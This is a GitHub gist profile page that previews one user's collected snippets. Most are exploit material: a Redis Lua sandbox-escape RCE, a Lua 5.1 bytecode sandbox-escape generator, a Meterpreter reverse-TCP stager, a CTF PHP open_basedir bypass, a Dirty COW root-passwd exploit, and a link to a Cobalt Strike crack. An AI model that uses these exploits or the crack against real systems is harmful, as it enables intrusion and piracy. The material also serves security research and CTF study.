Skip to content

Instantly share code, notes, and snippets.

View wonderkun's full-sized avatar

wonderkun

574 followers · 337 following
View GitHub Profile
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from orangetw/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
@wonderkun
wonderkun / Exploiting Lua 5.1 on 32-bit Windows.md
Created October 13, 2019 09:13 — forked from corsix/Exploiting Lua 5.1 on 32-bit Windows.md

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
@wonderkun
wonderkun / meterpreter_reverse_tcp_stager.asm
Created September 16, 2019 05:48 — forked from Dliv3/meterpreter_reverse_tcp_stager.asm
; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm
; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
; hash算法&预定义好的各种函数的hash值: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
; PE结构: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format
;《0day安全:软件漏洞分析技术》92页
; https://blog.cob
@wonderkun
wonderkun / MoP.php
Created September 16, 2019 05:36 — forked from wupco/MoP.php
realworldctf
<?php
function bypass_open_basedir(){
if(!is_dir('/tmp/ab')){
mkdir('/tmp/ab');
}
chdir('/tmp/ab');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
@wonderkun
wonderkun / chrome_install_headless.sh
Created August 13, 2019 06:43 — forked from Leotomas/chrome_install_headless.sh
Install Chrome headless on Ubuntu
export CHROME_BIN=/usr/bin/google-chrome
export DISPLAY=:99.0
sh -e /etc/init.d/xvfb start
sudo apt-get update
sudo apt-get install -y libappindicator1 fonts-liberation
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome*.deb
@wonderkun
wonderkun / ClassBuilder.py
Created December 10, 2018 02:10
ClassBuilder.py
#!/bin/python
###############################################
# File Name : ClassBuilder.py
# Author : rootkiter
# E-mail : rootkiter@rootkiter.com
# Created : 02/10 10:30:41 2017
###############################################
TYPE_U16 = 'u16'
TYPE_U32 = 'u32'
@wonderkun
wonderkun / cobaltstrike.crack
Created November 15, 2018 15:07
cobaltstrike.crack
http://transfer.sh3ll.me/K3wEk/cobaltstrike.jar.patch
@wonderkun
wonderkun / dirtycow.c
Created November 15, 2018 08:11
脏牛漏洞
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
@wonderkun
wonderkun / unicode.py
Created November 6, 2018 15:37
unicode normalize to ascii
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import json
from unicodedata import normalize
def main():
debug = True
tables = {}